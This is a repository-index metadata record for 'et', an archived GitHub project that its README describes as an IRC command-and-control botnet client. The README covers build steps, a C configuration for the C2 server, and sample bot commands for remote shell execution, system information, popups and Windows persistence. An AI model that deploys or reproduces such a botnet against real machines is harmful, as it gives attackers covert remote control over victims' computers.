{"id":15403243,"url":"https://github.com/woodruffw/et","last_synced_at":"2025-10-11T07:30:27.103Z","repository":{"id":19221396,"uuid":"22455657","full_name":"woodruffw/et","owner":"woodruffw","description":"ET - the extraterrestrial botnet","archived":true,"fork":false,"pushed_at":"2014-12-15T02:44:45.000Z","size":565,"stargazers_count":3,"open_issues_count":0,"forks_count":3,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-01-22T02:12:19.394Z","etag":null,"topics":["botnet","irc","irc-client"],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/woodruffw.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-07-31T03:52:31.000Z","updated_at":"2024-07-08T03:34:14.000Z","dependencies_parsed_at":"2022-09-03T10:11:21.442Z","dependency_job_id":null,"html_url":"https://github.com/woodruffw/et","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/woodruffw%2Fet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/woodruffw","download_url":"https://codeload.github.com/woodruffw/et/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":236057506,"owners_count":19088060,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["botnet","irc","irc-client"],"created_at":"2024-10-01T16:06:52.071Z","updated_at":"2025-10-11T07:30:21.786Z","avatar_url":"https://github.com/woodruffw.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"et - the extraterrestrial botnet\n===\n\n### What is it?\n`et` is a dumb client to an IRC command-and-control server.\n\nWhen activated, it \"phones home\" and awaits instructions from members of an IRC channel.\n\nIt can be instructed to retrieve system information and execute commands, among other things.\n\n### Compilation\n\n**IMPORTANT**: Many binary size reduction methods are not applied by default during *nix builds due to the wide variety of utilities/flags that provide that\nfunctionality on different systems. For example, standard symbol stripping (-s) is not applied because OS X no longer uses (-s) to strip symbols.\nTo add your own size-optimization flags, either edit the makefile or feed them in by assigning to `LDFLAGS_NIX` while calling `make`.\nIn addition, on Windows, you can try using a third-party tool like [UPX](http://upx.sourceforge.net/) to further reduce executable size.\n\n#### On *nix systems (Linux, BSD, OS X):\n```bash\n$ git clone https://github.com/woodruffw/et \u0026\u0026 cd et\n$ make nix # compiles et in ./bin\n```\n\n#### On Windows:\nBuilding on Windows requries `make` and `gcc`, both of which can be obtained through the [MinGW](http://www.mingw.org/) project.\n\nDownload the tarball, extract it somewhere, and run `mingw32-make` inside of that directory in CMD.exe. The `et.exe` binary will be left in \"bin\".\n\n\n**IMPORTANT**: Do not actually run the resulting `et` binary, as it *WILL* open your computer to attack.\n\n### Configuration\n\nMany of `et`'s features can be configured in the *cnc_info.h* file under *./src*.\n\nFor example:\n```C\n#define IRC_SERVER \"irc.example.com\"\n#define IRC_PORT 6667\n#define IRC_CHANNEL \"#yourchannel\"\n#define IRC_REPORT \"hello!\"\n#define IRC_AUTH \"super secret password\"\n```\n\nAny changes made require recompilation.\n\n### Usage\nControlling the `et` bots from the IRC server is very simple.\n\nWhen each bot connects, it sends out a channel-wide message of the format:\n```\net0000000: et0000000 phoning home\n```\n\nFrom that point on, the bot is ready to receive commands. There are a few built-in commands:\n* `auth \u003cpassword\u003e` - Requests authorization to control the bot. If the password matches `IRC_AUTH` in *cnc_info.h*, authorization is granted.\n* `deauth` - Deauthorizes control of the bot unconditionally. Once deauthorized, the bot may not execute any command but `auth`.\n* `info` - Outputs a digest of system information. Supplied by `uname(3)` on Unix and Linux and `GetVersionEx`/`GetUserName` on Windows.\n* `popup \u003cmessage\u003e` - **CURRENTLY WINDOWS ONLY**. Display a popup message on the client's screen.\n* `persist` - **CURRENTLY WINDOWS ONLY**. Ensures that the `et` executable, if killed, will restart on the next login. \n* `depersist` - **CURRENTLY WINDOWS ONLY**. Does the opposite of `persist`, removing `et`'s persistence after logout.\n* `kill` - Disconnects the bot from the IRC server. Unless scheduled otherwise on the system, the bot will never reconnect.\n\nAside from these four commands, all other commands passed to an `et` are passed directly to `popen(3)` (`_popen()` on Windows).\n\nBy default `deauth`, `info`, `kill`, and all other commands are restricted until the bot is authorized with `auth`.\n\nSome examples, all from the IRC prompt:\n```\net0000000: et0000000 phoning home\n/msg et0000000 auth et-phone-home\net0000000: Successfully authorized. et0000000 listening.\n/msg et0000000 info\net0000000: [some information]\n/msg et0000000 pwd\net0000000: [the current working directory]\n/msg et0000000 popup hello, i'm controlling your computer\n/msg et0000000 kill\n*et0000000 has quit ()\n```\n\nCurrently, output from system commands is limited to approximately 512 characters. For more information on IRC's limitations, read [RFC 2812](http://tools.ietf.org/rfc/rfc2812.txt).\n\n**IMPORTANT**: Because I tested `et` with ngIRCd, I made a few assumptions about common server characteristics. For example, `et` will always respond to a `PING` with\na `PONG` message containing the server's name, simply because that's the most common `PING`/`PONG` message. If you encounter timeout issues, it's probably because your IRC server\nsends a different `PING` message.\n\n### Proof of Concept\nThe original PoC Python script can be found under *./src/poc/et.py*. Like the actual version, it does work and *WILL* expose your machine.\n\n### Theoretical Limits\nBecause the IRC protocol limits nicks to 9 characters, only so many `et`s can operate within a single channel.\n\nBy default, the first two characters of an `et`'s nick will always be 'et,' meaning that at most 10 million `et`s can exist within a channel.\nFurthermore, because I got lazy with the Windows version, the ID on Windows machines can only be in the range [0, (32768 \u003c\u003c 8)] for a total number of 8,388,609 possible IDs on Windows.\nOf course, because the trailing numbers are pseudorandom and not sequential, the actual point of collision is likely to be much lower than 10 million (or 8,388,609 for that matter).\nOn the other hand, `et` can be configured to \"phone home\" to other servers and channels, making the limit less relevant in practice.\n\n### TODO\n* Reduce binary size\n* Prevent Windows CMD popups\n* Add more built-in commands\n\n### Contributing\n\n`et` is licensed under the MIT licence. \n\nPlease feel free to issue merge requests, even for small things. I appreciate all contributions.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwoodruffw%2Fet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwoodruffw%2Fet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwoodruffw%2Fet/lists"}